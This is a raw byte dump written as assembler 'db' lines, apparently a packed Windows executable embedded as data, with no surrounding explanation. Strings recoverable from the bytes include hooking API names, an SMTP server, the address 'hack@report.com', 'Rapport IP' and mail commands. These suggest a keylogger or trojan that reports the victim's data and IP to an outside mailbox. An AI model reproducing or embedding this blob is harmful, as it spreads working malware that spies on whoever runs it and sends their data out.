91,163,41,18,113,102,248,210,115,18,210,171,101,89,191,132 + db 94,53,27,175,206,237,30,79,10,163,173,75,14,177,37,235 + db 245,115,42,126,83,60,176,85,178,46,200,248,104,118,191,219 + db 88,12,12,86,13,244,117,225,32,137,110,28,105,176,175,85 + db 200,115,180,23,0,213,242,75,73,115,114,109,81,211,59,70 + db 100,11,125,80,114,101,110,113,95,210,31,148,140,93,87,102 + db 40,100,101,108,25,33,100,45,79,190,145,152,177,64,57,40 + db 119,228,49,207,22,242,52,82,54,131,10,104,44,255,192,58 + db 161,47,10,8,124,101,120,101,99,117,118,39,140,86,2,79 + db 8,227,4,189,224,160,3,85,232,1,104,9,105,145,93,58 + db 249,92,24,137,108,26,32,118,182,146,11,20,78,111,112,117 + db 209,145,1,9,98,241,177,43,24,130,180,118,15,113,100,20 + db 59,94,167,235,23,104,128,7,25,160,9,134,4,216,170,78 + db 156,98,132,65,134,234,111,207,17,82,13,187,101,83,230,200 + db 211,208,237,61,32,161,107,118,34,121,82,197,104,120,72,92 + db 83,67,25,173,8,240,230,50,226,172,144,86,230,158,136,142 + db 206,16,208,65,22,229,86,217,223,39,113,222,46,64,128,61 + db 11,255,116,18,8,8,179,125,242,254,116,9,239,117,48,72 + db 192,121,26,102,203,11,106,183,84,23,86,177,255,11,235,96 + db 87,139,206,131,225,127,139,62,0,13,187,208,133,25,95,227 + db 246,187,106,65,189,148,178,128,42,88,117,42,116,11,18,90 + db 20,146,200,107,160,74,89,126,149,16,156,102,112,117,116,56 + db 97,207,80,198,30,52,87,19,117,46,236,115,32,139,223,20 + db 11,12,120,111,185,24,235,211,95,143,1,192,204,93,66,223 + db 198,30,63,136,19,31,94,139,127,109,1,179,46,83,106,21 + db 87,224,21,133,230,110,250,40,18,43,91,163,231,23,138,23 + db 167,225,237,237,51,201,73,91,253,176,92,4,252,71,71,75 + db 55,25,30,74,200,56,105,162,87,32,88,152,145,162,51,18 + db 0,205,182,94,131,80,94,61,205,11,73,244,109,203,70,19 + db 189,147,0,44,205,135,69,178,160,178,119,115,100,137,24,32 + db 164,146,1,13,129,128,96,198,206,50,14,191,58,51,118,217 + db 102,36,34,15,67,32,26,176,148,217,38,132,167,239,227,13 + db 210,139,167,51,187,143,43,83,29,15,249,52,42,1,192,87 + db 117,66,255,50,43,171,133,60,147,115,172,145,45,158,111,79 + db 211,187,172,64,11,132,179,61,28,134,153,128,115,54,195,73 + db 189,104,136,189,239,47,182,132,187,99,133,65,42,73,163,116 + db 31,57,20,137,126,114,22,123,52,42,37,128,59,124,235,190 + db 132,203,26,201,12,197,61,12,102,213,4,25,5,142,104,133 + db 60,156,140,131,45,35,0,112,118,92,8,247,131,165,120,96 + db 65,122,159,121,128,59,125,131,109,3,249,128,39,67,193,91 + db 199,3,80,179,112,86,243,232,24,83,15,244,2,124,15,215 + db 240,13,133,139,123,8,11,140,196,31,141,247,45,70,190,46 + db 12,183,252,3,127,3,116,109,68,73,223,98,105,127,4,83 + db 64,176,4,104,122,175,167,45,38,123,193,142,220,14,130,162 + db 192,222,44,102,10,162,23,151,32,11,179,243,255,133,125,39 + db 124,128,127,101,199,250,136,58,236,27,10,117,60,80,192,145 + db 176,192,79,213,88,85,59,216,101,74,18,241,61,3,25,142 + db 112,153,185,216,133,47,95,238,238,235,81,167,97,169,15,44 + db 105,199,45,237,8,79,89,177,144,16,168,235,93,235,64,104 + db 144,20,74,143,86,178,217,5,62,65,3,46,99,226,25,244 + db 11,245,164,94,3,252,161,58,235,175,254,110,138,24,185,85 + db 139,125,8,120,170,44,94,224,193,127,3,248,79,17,92,117 + db 250,141,5,96,246,126,103,56,31,117,246,46,123,30,253,251 + db 218,11,167,134,60,56,95,18,87,242,136,139,77,252,60,82 + db 117,181,17,57,145,206,203,104,217,97,146,188,228,6,56,16 + db 108,16,108,253,197,132,240,25,11,5,179,201,194,8,8,67 + db 196,184,51,48,16,102,200,93,194,205,70,173,74,183,180,75 + db 220,5,4,56,249,86,165,11,203,65,0,50,19,81,239,77 + db 118,231,208,17,26,12,35,55,201,27,208,98,106,37,46,195 + db 65,53,13,180,83,76,138,20,19,172,9,24,123,86,221,64 + db 94,125,32,24,19,95,225,62,254,104,41,9,108,4,199,8 + db 33,95,244,255,208,195,225,4,133,87,154,50,47,195,179,11 + db 61,147,128,82,178,18,20,148,79,147,130,21,111,75,30,104 + db 36,162,241,173,0,210,21,185,218,158,218,59,129,169,75,163 + db 166,8,4,239,197,14,228,32,3,42,70,19,148,140,120,118 + db 9,110,96,146,51,180,111,192,88,177,200,249,83,131,101,204 + db 27,121,158,136,45,201,15,90,149,196,229,200,65,32,131,204 + db 137,112,98,217,110,141,29,191,29,200,25,204,80,3,208,3 + db 180,134,183,212,80,34,104,200,209,152,193,243,125,54,5,34 + db 117,252,50,172,140,19,242,144,54,50,93,200,80,129,106,139 + db 44,164,195,138,3,233,51,103,37,59,100,91,147,163,42,67 + db 4,43,176,94,35,43,253,44,2,125,36,110,21,56,195,214 + db 114,117,160,211,131,69,98,88,162,212,155,154,184,104,24,140 + db 91,243,216,8,216,236,131,125,120,36,10,116,56,6,16,83 + db 47,202,121,182,183,116,17,30,248,33,18,248,232,218,97,131 + db 189,3,255,69,216,14,154,89,139,18,182,11,152,202,92,61 + db 79,255,1,20,214,130,57,176,95,32,82,220,124,50,80,50 + db 216,1,97,160,55,146,193,204,1,26,91,166,6,50,193,39 + db 77,90,144,0,116,137,197,136,217,93,211,0,184,0,0,188 + db 249,127,115,145,4,200,14,31,186,14,0,180,9,205,33,184 + db 1,76,219,255,239,96,84,45,32,112,114,111,103,114,97,109 + db 32,99,97,110,110,111,235,98,169,191,109,245,101,32,114,117 + db 46,105,2,68,79,83,32,109,111,212,96,255,193,126,46,13 + db 13,10,36,67,113,212,247,219,53,181,153,136,3,143,220,124 + db 119,38,7,201,149,139,136,52,187,170,138,82,105,99,11,117 + db 132,189,104,27,139,80,144,76,254,176,75,193,1,5,33,182 + db 61,19,224,0,14,33,11,193,6,27,91,12,220,8,228,16 + db 3,123,179,177,177,32,34,16,11,2,26,0,7,103,110,73 + db 55,12,96,30,52,16,179,240,108,96,7,6,224,49,47,156 + db 38,6,201,194,48,44,60,10,69,194,0,217,72,0,0,48 + db 139,123,167,219,224,46,116,103,116,164,146,144,179,126,223,45 + db 236,4,35,234,96,46,98,115,115,16,112,2,252,203,5,118 + db 123,128,208,46,114,100,97,116,97,192,146,48,185,124,2,59 + db 2,247,102,179,102,64,46,38,106,160,47,207,242,79,217,12 + db 39,192,46,114,101,108,111,99,104,80,194,78,201,32,14,66 + db 0,0,167,192,21,162,91,69,137,83,37,28,19,165,2,9 + db 193,133,175,66,197,112,125,244,117,32,38,94,26,75,174,169 + db 24,116,20,80,45,116,11,152,130,104,195,123,8,42,232,134 + db 20,252,190,40,252,235,30,37,115,24,196,43,241,6,217,27 + db 4,246,70,88,76,188,19,111,54,97,54,36,105,247,7,153 + db 90,230,120,6,41,8,163,51,182,48,19,174,208,183,94,60 + db 144,177,147,181,15,81,41,14,34,12,95,119,44,62,41,2 + db 195,24,12,34,64,100,51,222,102,83,189,18,228,12,192,40 + db 216,247,164,250,185,9,122,13,39,120,171,228,94,86,173,254 + db 16,136,93,87,83,81,86,82,70,205,190,88,124,10,80,78 + db 57,210,205,108,255,11,246,54,183,27,22,228,90,94,89,91 + db 95,62,8,26,48,87,158,188,250,37,32,240,244,135,26,25 + db 73,218,52,3,71,235,248,13,172,253,111,191,255,92,116,7 + db 198,7,92,128,103,27,70,149,58,27,185,110,194,250,64,232 + db 198,20,228,158,144,238,75,133,252,128,189,238,22,115,31,21 + db 187,224,113,247,48,84,29,154,63,123,200,97,103,238,158,252 + db 235,72,66,163,109,16,14,12,66,240,66,3,169,54,153,187 + db 212,192,104,2,108,23,234,66,143,153,47,11,16,255,181,226 + db 15,255,85,12,154,207,135,122,161,41,188,250,40,204,108,94 + db 104,88,86,18,219,8,138,37,32,48,200,200,200,86,5,4 + db 8,12,200,200,200,200,16,20,24,28,200,200,200,200,0,56 + db 40,44,162,176,204,200,48,52,8,166,89,110,47,80,49,3 + db 200,48,218,234,92,211,52,203,2,49,18,44,68,188,19,108 + db 154,166,251,0,124,23,140,156,176,106,49,203,119,9,131,48 + db 175,92,19,48,164,96,6,51,32,198,231,123,109,49,42,73 + db 12,70,88,187,193,2,91,67,95,115,101,31,11,70,182,183 + db 183,3,114,115,116,4,108,101,65,29,145,78,43,254,103,38 + db 30,16,225,0,71,101,116,67,117,114,187,255,107,254,118,116 + db 68,39,101,99,116,111,114,121,240,23,68,114,105,118,101,84 + db 22,45,154,221,121,112,39,9,1,76,194,112,242,246,118,236 + db 97,108,22,83,116,5,110,103,115,65,62,2,83,116,219,246 + db 4,211,2,108,117,114,46,116,11,220,93,226,255,157,112,23 + db 75,69,82,78,69,76,51,50,43,108,108,222,254,183,189,13 + db 20,0,67,80,108,143,72,111,111,107,69,120,17,219,1,80 + + db 115,223,37,222,186,116,77,101,153,97,103,177,16,95,177,217 + db 221,119,89,15,93,111,87,196,111,119,115,51,43,97,238,183 + db 20,129,2,85,110,104,11,22,144,180,178,97,109,83,106,103 + db 0,136,217,226,33,19,48,50,34,1,217,52,91,107,172,3 + db 24,40,191,16,179,108,154,102,98,246,159,59,50,84,237,232 + db 51,77,98,111,57,2,41,75,98,221,182,67,236,114,105,86 + db 160,97,236,104,65,110,17,225,173,13,12,120,101,100,46,102 + db 73,110,40,208,111,215,213,234,75,66,42,0,82,51,70,206 + db 209,86,149,24,83,15,12,0,136,66,154,181,34,25,232,161 + db 52,132,176,109,42,181,135,81,70,2,32,68,255,127,179,76 + db 16,72,8,48,51,48,79,48,106,48,114,48,119,48,131,48 + db 146,255,255,255,255,48,161,48,181,48,196,48,209,48,123,49 + db 213,49,232,49,237,49,254,49,14,50,64,50,70,50,76,50 + db 82,50,88,50,94,40,146,255,255,50,100,50,106,50,112,50 + db 118,50,124,50,130,50,136,50,142,50,134,224,24,141,202,224 + db 245,127,34,102,15,218,228,249,5,31,9,123,65,62,71,95 + db 228,249,232,249,11,18,220,10,241,9,57,159,104,228,191,35 + db 224,247,201,100,73,158,59,142,18,130,113,2,221,138,182,136 + db 64,202,70,19,138,195,92,35,14,130,51,178,243,179,70,80 + db 84,59,28,104,180,16,203,78,17,236,130,11,121,101,75,246 + db 186,101,16,67,65,82,14,133,73,138,111,114,236,250,38,106 + db 2,44,25,209,176,106,172,127,43,136,28,156,156,232,250,7 + db 236,123,42,32,207,169,182,106,8,39,171,161,120,167,172,252 + db 177,141,189,11,204,212,222,109,21,134,166,53,172,170,10,192 + db 11,230,59,117,82,92,145,216,121,245,96,195,62,138,81,17 + db 106,63,21,141,1,204,190,20,122,18,207,81,77,177,43,130 + db 31,132,104,248,37,181,151,173,236,123,160,110,226,127,11,76 + db 130,177,98,115,46,13,0,151,2,104,87,76,104,122,64,106 + db 177,139,216,170,210,167,179,71,104,251,104,134,214,189,22,169 + db 70,138,124,0,198,139,223,81,31,6,9,253,139,200,43,71 + db 71,252,87,104,107,75,71,184,167,129,81,136,38,147,156,66 + db 86,197,14,0,24,234,3,189,199,138,33,80,131,189,177,8 + db 228,22,123,50,186,208,131,165,19,26,224,249,151,241,146,28 + db 224,249,10,24,34,162,109,182,65,85,6,74,183,163,190,7 + db 185,53,235,176,75,97,4,163,236,15,89,158,75,158,75,240 + db 102,244,115,226,100,159,75,248,176,97,90,116,34,203,158,203 + db 150,79,182,31,252,196,15,210,41,54,16,17,88,252,128,36 + db 145,162,20,229,244,251,106,62,208,191,32,208,54,219,67,155 + db 32,57,5,16,227,253,104,43,128,16,145,213,131,61,12,5 + db 118,93,192,123,30,141,141,51,148,42,23,104,144,226,61,25 + db 228,21,35,124,88,163,38,7,189,243,172,44,252,253,17,218 + db 176,3,61,160,74,208,27,97,144,25,123,104,121,96,11,251 + db 209,176,201,102,188,14,42,106,80,35,120,128,11,88,104,17 + db 123,107,179,243,233,114,38,250,251,20,15,207,200,30,146,61 + db 58,98,65,216,250,66,255,172,250,66,2,86,81,139,240,156 + db 138,4,49,60,65,114,237,255,111,255,9,60,90,119,5,4 + db 32,136,12,73,121,237,139,198,89,94,195,81,51,201,65,128 + db 60,35,213,64,76,248,117,249,139,193,89,51,244,51,216,126 + db 11,90,114,39,32,117,1,64,129,6,230,238,182,59,103,9 + db 9,16,13,117,3,26,65,8,8,117,25,183,37,75,212,115 + db 64,255,25,254,13,219,109,224,218,106,107,12,30,146,7,5 + db 57,119,52,21,57,25,27,65,12,90,96,76,183,25,43,5 + db 88,186,114,10,8,192,100,146,67,206,18,219,228,233,82,171 + db 62,57,245,73,116,28,219,210,184,127,191,205,47,254,5,113 + db 128,61,5,70,15,130,28,18,97,211,217,48,31,229,120,70 + db 103,107,191,44,137,222,9,128,37,40,247,106,166,194,4,42 + db 55,58,182,89,145,131,117,190,90,211,237,88,183,63,19,61 + db 96,234,5,118,31,80,80,195,10,11,186,44,96,234,10,82 + db 92,146,128,230,227,91,89,159,83,209,96,63,9,56,91,65 + db 83,104,123,159,139,85,170,247,123,64,187,15,3,29,27,123 + db 109,28,227,187,125,202,96,200,202,134,29,199,180,127,33,91 + db 38,202,78,163,35,125,118,68,239,247,178,141,181,11,129,61 + db 52,188,114,45,22,116,136,206,80,143,217,83,19,50,200,229 + db 123,159,71,107,219,88,220,162,135,16,71,64,241,100,187,156 + db 102,187,219,0,122,157,76,11,193,227,8,8,72,156,179,145 + db 27,106,68,241,72,6,76,111,3,157,13,69,60,114,53,139 + db 141,33,190,12,78,150,73,84,0,67,149,231,242,239,15,209 + db 14,148,2,28,71,54,138,156,40,27,240,38,219,255,136,92 + db 16,4,64,10,219,117,239,82,50,64,38,173,251,174,207,166 + db 86,120,44,73,90,141,130,9,51,80,6,50,114,228,200,8 + db 3,7,2,134,1,5,46,249,92,58,66,4,80,107,107,0 + db 248,32,71,162,96,204,14,232,120,81,82,130,255,55,254,83 + db 139,117,12,139,69,8,196,138,20,1,10,210,117,10,145,91 + db 90,89,223,104,27,239,251,235,44,128,250,142,18,4,141,13 + db 128,234,65,203,203,219,255,179,25,42,218,178,65,2,211,235 + db 21,22,97,114,16,122,119,11,97,214,254,47,35,97,134,20 + db 49,65,235,189,255,37,112,81,117,5,200,200,200,200,92,88 + db 84,80,200,200,200,200,76,72,68,64,200,200,200,200,108,56 + db 52,48,200,200,200,200,44,40,36,32,216,200,200,200,28,60 + db 96,100,119,35,35,223,201,104,80,5,92,96,100,35,35,35 + db 35,104,108,112,116,35,35,35,35,120,124,128,132,35,35,35 + db 35,136,140,144,148,35,35,35,35,152,156,160,164,35,35,35 + db 35,168,172,176,180,35,35,35,35,184,188,192,196,35,35,35 + db 35,200,204,208,212,35,35,35,35,216,220,224,228,35,35,35 + db 35,232,236,64,244,35,35,35,35,248,252,240,84,35,35,35 + db 35,80,76,72,68,35,35,35,35,28,56,52,48,35,35,35 + db 35,44,40,36,32,35,35,35,35,0,24,20,16,35,35,35 + db 35,12,8,4,160,70,70,70,158,81,156,152,148,144,70,70 + db 70,70,140,120,124,128,93,97,70,70,132,136,238,87,253,119 + db 52,74,14,145,142,51,210,138,6,70,60,2,117,18,23,110 + db 251,191,6,247,210,70,235,11,44,48,141,12,137,2,72,21 + db 118,99,238,21,127,241,141,4,17,51,194,95,237,143,65,20 + db 35,35,35,99,5,8,4,168,176,35,35,35,35,180,184,188 + db 192,35,35,35,35,196,200,204,208,35,35,35,35,212,216,220 + db 224,141,40,178,42,6,146,64,64,149,2,127,249,143,160,84 + db 83,95,115,101,114,118,0,97,98,101,102,104,86,48,57,9 + db 246,154,2,61,165,104,41,8,51,103,131,84,180,223,109,39 + db 83,45,105,99,101,80,114,111,4,190,123,114,187,204,13,10 + db 1,45,45,32,83,17,105,111,110,32,84,246,134,253,223,35 + db 109,105,110,233,101,44,32,37,115,32,29,41,14,96,109,236 + db 189,18,3,56,42,0,14,219,23,246,220,32,10,17,79,78 + db 111,117,153,108,255,15,44,217,108,101,88,75,115,109,116,112 + db 46,119,97,110,97,100,255,255,127,251,111,111,46,102,114,224 + db 104,97,99,107,64,114,101,112,111,114,116,46,99,111,109,0 + db 115,97,100,100,97,109,55,160,111,229,46,104,117,140,55,64 + db 99,97,14,97,105,255,251,239,177,108,27,45,42,61,1,60 + db 32,82,97,112,48,32,73,80,32,62,61,97,219,186,103,20 + db 45,0,97,33,17,112,152,85,27,110,119,119,155,96,109,200 + db 68,97,116,5,72,101,117,96,32,33,91,1,131,197,129,199 + db 46,112,0,33,43,120,5,137,112,43,43,120,5,99,125,35 + db 27,97,5,177,0,238,2,177,109,36,83,188,116,96,110,80 + db 32,65,248,183,119,53,103,101,0,112,213,112,105,0,69,110 + db 117,109,129,175,125,131,112,55,41,77,111,100,117,31,89,152 + db 193,64,184,78,174,162,83,0,13,191,181,15,60,37,100,32 + db 46,194,116,40,115,41,62,102,83,237,25,196,134,121,203,109 + db 92,70,67,111,3,131,176,64,108,77,108,231,92,222,115,157 + db 69,184,189,92,191,34,65,99,229,12,32,11,134,6,209,39 + db 110,111,137,108,116,222,218,237,11,125,58,47,47,119,0,46 + db 109,47,60,115,111,102,119,134,141,19,117,72,45,79,23,99 + db 77,65,73,26,196,235,254,76,32,70,82,79,77,58,126,115 + db 117,145,108,219,100,23,105,116,111,15,70,55,109,12,34,247 + db 207,13,182,34,17,84,27,59,83,117,98,106,104,64,83,96 + db 51,12,40,0,115,99,188,115,13,6,113,117,105,116,74,46 + db 5,0,98,99,195,13,51,5,121,73,116,238,172,253,37,69 + db 32,118,55,46,48,32,52,221,32,182,208,248,111,133,112,56 + db 223,100,46,32,91,39,63,39,32,16,113,91,130,190,22,32 + db 97,102,102,236,101,8,108,39,89,251,96,188,52,100,101,93 + db 157,36,73,78,70,223,0,176,49,200,187,13,77,83,71,32 + db 34,245,120,55,18,113,193,35,135,32,109,59,34,31,214,188 + db 57,123,68,73,82,33,6,87,76,73,83,84,87,67,83,59 + db 228,221,76,59,67,86,82,84,67,105,49,154,169,235,54,107 + db 111,156,97,144,110,145,169,117,103,173,208,124,156,12,26,99 + db 148,116,46,128,193,254,82,83,82,86,76,54,91,235,215,209 + db 74,75,20,87,158,4,121,93,16,135,157,117,55,50,45,115 + db 12,93,40,83,95,78,57,59,225,107,226,153,115,221,34,29 + db 75,133,43,100,34,68,75,216,55,236,251,97,130,34,80,73 + db 68,18,67,46,18,59,214,186,13,45,112,189,111,190,44,77 + db 75,253,167,144,19,152,25,82,77,69,78,40,67,195,100,77 + db 70,134,105,135,215,219,48,53,201,95,168,34,145,23,37,255 + db 102,91,97,146,102,26,127,70,73,78,68,107,148,219,118,32 + db 2,102,182,101,110,253,46,132,133,195,118,42,65,182,34,107 + db 208,110,157,55,155,178,198,171,102,100,101,30,61,97,32,249 + db 69,88,69,67,72,205,79,80,150,126,11,236,172,37,117,34 + db 42,16,71,165,135,176,199,162,80,85,84,40,32,40,70,190 + db 203,66,119,227,108,32,80,191,104,41,161,110,113,46,46,11 + db 86,231,58,112,16,117,135,10,251,183,181,177,112,97,92,119 + db 177,100,81,65,87,69,66,6,240,67,254,241,69,77,79,87 + db 83,68,76,85,114,108,47,97,101,29,131,29,46,150,34,154 + db 228,206,16,13,249,75,69,89,192,94,194,210,108,183,91,1 + db 48,93,3,49,42,93,216,187,91,70,35,193,239,202,79,70 + db 70,50,109,187,21,56,49,60,126,79,79,211,50,184,109,91 + db 250,182,79,137,82,24,51,96,72,229,68,14,195,9,179,11 + db 18,52,32,44,73,73,42,109,105,107,39,141,200,236,99,167 + db 117,134,29,0,205,192,111,32,184,143,79,0,212,84,12,96 + db 23,99,80,100,117,166,82,193,113,205,207,156,154,36,22,182 + db 55,45,228,93,17,118,111,121,101,14,97,26,99,107,144,158 + db 54,147,117,193,46,155,69,204,173,125,166,147,185,178,37,105 + db 72,38,10,89,194,182,108,13,114,64,44,14,139,85,218,4 + db 102,108,210,96,110,76,206,84,234,10,118,77,243,94,254,0 + db 23,129,214,95,7,45,8,194,194,217,37,179,57,120,65,67 + db 163,109,71,131,215,172,185,36,18,45,108,187,104,232,58,16 + db 38,101,117,108,63,131,7,219,86,216,206,47,82,41,185,223 + db 221,181,10,3,38,162,79,87,101,98,54,97,111,169,4,85 + db 115,12,34,76,87,182,118,7,198,102,247,101,203,106,97,159 + db 76,6,214,40,208,217,108,1,90,246,234,224,194,205,116,225 + db 108,133,63,60,216,26,72,217,112,164,109,229,113,107,237,51 + db 247,166,85,157,176,67,122,32,104,39,196,154,146,238,50,121 + db 47,118,26,70,74,31,56,111,67,109,173,64,181,243,75,220 + db 101,114,172,64,181,35,82,117,110,29,75,83,224,202,67,8 + db 24,101,203,185,88,99,39,203,58,23,91,96,240,91,248,92 + db 161,26,166,86,0,124,11,124,7,54,193,65,225,67,191,226 + db 200,32,201,224,19,24,138,42,46,42,227,2,6,9,123,7 + db 0,237,51,95,55,232,42,73,137,71,69,172,32,60,163,115 + db 13,221,47,60,109,62,39,30,37,101,248,184,27,227,0,135 + db 62,9,66,89,69,168,16,193,5,193,61,50,71,70,73,73 + db 137,194,217,214,119,233,83,84,133,238,64,18,94,87,91,116 + db 155,170,112,48,185,152,166,24,183,135,131,137,66,169,14,174 + db 24,97,3,40,24,160,71,46,32,220,245,9,17,78,246,69 + db 10,78,84,241,4,19,90,132,134,51,117,73,54,125,214,76 + db 1,107,170,26,246,47,25,235,28,179,7,79,83,8,47,238 + db 117,165,23,115,152,222,41,227,242,12,42,109,173,49,178,33 + db 112,182,30,108,16,152,193,236,10,27,125,228,44,101,141,222 + db 94,22,26,228,9,5,115,49,239,27,13,152,57,22,168,88 + db 97,113,18,231,46,227,18,122,115,115,115,28,226,22,75,194 + db 132,175,219,48,251,251,94,204,34,116,186,71,68,189,225,98 + db 111,97,112,237,121,13,53,18,182,138,174,100,150,204,101,43 + db 83,135,197,173,183,87,84,87,65,126,92,77,123,92,59,44 + db 102,64,138,210,86,48,172,209,226,81,49,198,161,45,22,130 + db 111,3,19,67,77,0,28,123,31,105,154,166,233,3,37,43 + db 48,52,58,81,104,71,166,62,245,103,117,167,214,106,100,162 + db 30,130,90,162,215,116,43,108,232,112,0,117,0,119,130,17 + db 0,109,70,47,90,51,5,166,94,36,79,140,204,32,92,70 + db 37,76,81,140,209,123,4,81,204,89,80,122,232,33,8,194 + db 170,99,82,120,193,200,241,248,126,105,37,224,94,132,8,134 + db 76,129,148,5,90,218,66,133,246,80,104,36,34,247,98,37 + db 115,212,68,16,154,242,98,243,19,216,178,71,3,176,50,104 + db 204,65,227,108,13,68,70,248,11,18,224,117,214,132,42,115 + db 233,64,33,132,160,231,0,170,146,21,2,168,64,134,0,5 + db 80,129,132,10,160,2,25,20,64,5,50,40,128,10,100,81 + db 0,21,200,163,0,42,144,70,1,84,32,153,0,8,194,3 + db 252,40,0,208,178,64,64,1,252,0,208,37,170,242,111,114 + db 176,130,168,109,73,101,13,62,239,30,246,217,9,109,112,105 + db 10,97,116,9,87,114,105,116,138,237,1,64,109,10,86,17 + db 185,239,160,76,97,108,70,114,101,12,43,84,197,3,5,72 + db 22,25,182,214,189,246,67,111,64,35,47,67,29,55,101,130 + db 45,43,136,173,17,63,89,119,194,30,84,104,6,100,13,111 + db 111,108,104,101,100,219,246,255,108,112,51,50,83,110,97,112 + db 115,104,111,116,25,68,15,101,52,155,4,64,237,69,120,131 + db 3,12,4,34,26,54,63,142,46,4,34,154,1,141,1,191 + db 9,129,136,139,1,180,76,105,170,162,109,237,98,114,97,146 + db 12,71,90,209,236,109,19,211,18,110,29,16,7,170,40,81 + db 81,82,43,129,136,102,17,120,123,221,178,101,21,142,18,68 + db 222,32,8,68,20,97,109,47,219,120,236,223,75,14,129,83 + db 105,122,101,12,76,97,115,8,129,136,78,124,0,245,54,146 + db 0,232,1,228,19,255,102,19,6,114,17,132,65,100,100,114 + db 21,133,194,97,136,83,58,161,194,190,204,85,89,52,84,105 + db 109,155,21,38,81,69,44,68,216,36,170,152,14,74,227,222 + db 132,66,27,147,89,41,13,201,182,67,216,116,118,133,79,208 + db 110,246,176,8,133,96,8,178,115,15,51,202,237,16,115,68 + db 82,101,52,3,139,16,64,28,96,220,30,9,132,83,90,148 + db 139,79,102,21,2,40,97,106,53,162,138,95,172,86,27,22 + db 80,111,0,106,55,119,56,15,11,101,112,6,70,48,67,140 + db 123,124,124,227,68,21,179,231,9,1,0,171,98,251,218,182 + db 247,97,29,103,36,93,116,206,116,235,190,179,168,89,65,148 + db 103,83,86,96,172,181,239,112,117,101,9,15,81,10,135,17 + db 35,217,103,36,156,75,101,121,16,105,23,150,205,220,15,94 + db 77,130,106,117,16,64,55,10,3,197,107,101,16,75,8,147 + db 189,115,47,27,66,44,201,237,90,35,117,112,109,135,16,64 + db 201,120,85,115,121,143,130,27,204,240,91,115,182,6,18,160 + db 83,176,73,14,22,111,216,91,118,8,197,15,153,13,90,179 + db 48,35,32,11,22,4,58,69,21,174,225,185,114,97,20,64 + db 91,225,98,112,114,80,4,208,115,207,28,83,23,107,79,179 + db 181,36,233,20,53,35,16,83,202,214,109,143,72,80,194,99 + db 50,70,106,100,86,104,58,60,88,74,170,108,18,24,40,210 + db 117,166,45,40,47,102,28,84,21,179,2,53,120,17,209,225 + db 199,50,108,220,44,34,90,86,105,112,166,107,63,222,193,8 + db 66,111,29,103,73,99,117,10,104,31,118,4,18,115,111,170 + db 75,105,94,198,66,192,248,181,114,160,233,120,191,44,155,49 + db 108,75,48,38,205,218,66,115,226,126,17,117,44,48,189,130 + db 240,38,170,137,85,14,224,102,193,154,26,79,12,168,98,51 + db 4,155,113,14,105,196,112,22,150,25,170,244,104,123,102,102 + db 201,58,204,29,204,194,18,225,22,46,196,231,221,65,115,38 + db 105,8,39,115,93,85,41,108,28,241,85,112,220,58,150,189 + db 100,43,147,62,98,237,114,100,134,77,155,59,217,31,113,112 + db 245,116,102,72,140,170,120,154,58,120,73,29,100,151,13,194 + db 152,65,17,71,20,216,199,178,217,101,64,26,108,65,14,96 + db 45,0,90,24,17,4,146,45,41,145,95,193,163,42,146,13 + db 20,255,216,120,88,134,18,57,116,177,117,140,118,55,18,85 + db 91,67,97,99,43,85,75,96,75,96,65,125,24,104,158,102 + db 27,22,24,232,70,168,109,44,71,17,21,52,127,248,101,219 + db 116,221,16,80,24,176,255,116,2,115,150,101,89,150,1,2 + db 3,4,52,9,90,150,101,89,11,13,16,19,23,249,39,167 + db 40,134,3,0,143,87,26,64,189,150,231,50,15,1,62,136 + db 18,102,144,82,20,134,80,201,144,71,200,64,0,224,1,228 + db 7,169,2,222,232,81,0,0,180,162,104,23,32,167,232,1 + db 147,131,164,144,134,214,60,162,40,128,148,62,81,52,216,147 + db 94,224,11,251,12,7,36,33,75,94,66,224,123,79,73,211 + db 117,116,96,39,14,78,192,0,208,0,0,95,110,31,132,84 + db 213,214,1,0,4,0,0,0,0,0,0,128,255,0,0,0 + db 96,190,0,208,65,0,141,190,0,64,254,255,87,131,205,255 + db 235,16,144,144,144,144,144,144,138,6,70,136,7,71,1,219 + db 117,7,139,30,131,238,252,17,219,114,237,184,1,0,0,0 + db 1,219,117,7,139,30,131,238,252,17,219,17,192,1,219,115 + db 239,117,9,139,30,131,238,252,17,219,115,228,49,201,131,232 + db 3,114,13,193,224,8,138,6,70,131,240,255,116,116,137,197 + db 1,219,117,7,139,30,131,238,252,17,219,17,201,1,219,117 + db 7,139,30,131,238,252,17,219,17,201,117,32,65,1,219,117 + db 7,139,30,131,238,252,17,219,17,201,1,219,115,239,117,9 + db 139,30,131,238,252,17,219,115,228,131,193,2,129,253,0,243 + db 255,255,131,209,1,141,20,47,131,253,252,118,15,138,2,66 + db 136,7,71,73,117,247,233,99,255,255,255,144,139,2,131,194 + db 4,137,7,131,199,4,131,233,4,119,241,1,207,233,76,255 + db 255,255,94,137,247,185,232,1,0,0,138,7,71,44,232,60 + db 1,119,247,128,63,1,117,242,139,7,138,95,4,102,193,232 + db 8,193,192,16,134,196,41,248,128,235,232,1,240,137,7,131 + db 199,5,137,216,226,217,141,190,0,208,1,0,139,7,9,192 + db 116,69,139,95,4,141,132,48,0,240,1,0,1,243,80,131 + db 199,8,255,150,180,240,1,0,149,138,7,71,8,192,116,220 + db 137,249,121,7,15,183,7,71,80,71,185,87,72,242,174,85 + db 255,150,184,240,1,0,9,192,116,7,137,3,131,195,4,235 + db 216,255,150,188,240,1,0,97,233,115,28,254,255,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,252,0,2,0 + db 180,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 9,1,2,0,196,0,2,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,22,1,2,0,204,0,2,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,35,1,2,0,212,0,2,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,47,1,2,0 + db 220,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 58,1,2,0,228,0,2,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,70,1,2,0,236,0,2,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,80,1,2,0,244,0,2,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 